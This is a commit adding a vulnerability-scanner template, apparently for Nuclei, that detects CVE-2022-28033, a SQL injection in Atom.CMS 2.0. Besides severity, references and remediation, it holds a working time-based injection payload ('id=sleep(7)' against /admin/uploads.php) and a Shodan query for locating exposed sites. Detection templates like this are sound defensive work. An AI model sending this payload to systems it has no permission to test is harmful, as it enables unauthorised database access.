Dhiyaneshwaran
GitHub
commit
1d25803054
|
|
@ -0,0 +1,57 @@
|
|||
id: CVE-2022-28033
|
||||
|
||||
info:
|
||||
name: Atom.CMS 2.0 - SQL Injection
|
||||
author: ritikchaddha
|
||||
severity: critical
|
||||
description: |
|
||||
Atom.CMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_uploads.php which allows an attacker to execute arbitrary SQL commands.
|
||||
impact: |
|
||||
Successful exploitation could lead to unauthorized access, data leakage, and potential data manipulation.
|
||||
remediation: |
|
||||
Apply the latest security patches provided by the vendor to mitigate the SQL Injection vulnerability in Atom.CMS 2.0.
|
||||
reference:
|
||||
- https://github.com/thedigicraft/Atom.CMS/issues/259
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-28033
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-28033
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00172
|
||||
epss-percentile: 0.53749
|
||||
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
vendor: thedigitalcraft
|
||||
product: atomcms
|
||||
shodan-query: html:"atomcms"
|
||||
tags: cve,cve2022,atom,cms,sqli
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(tolower(body), "atomcms")'
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /admin/uploads.php?id=sleep(7) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=7'
|
||||
- 'contains(body, "WHERE id")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
Loading…
Reference in New Issue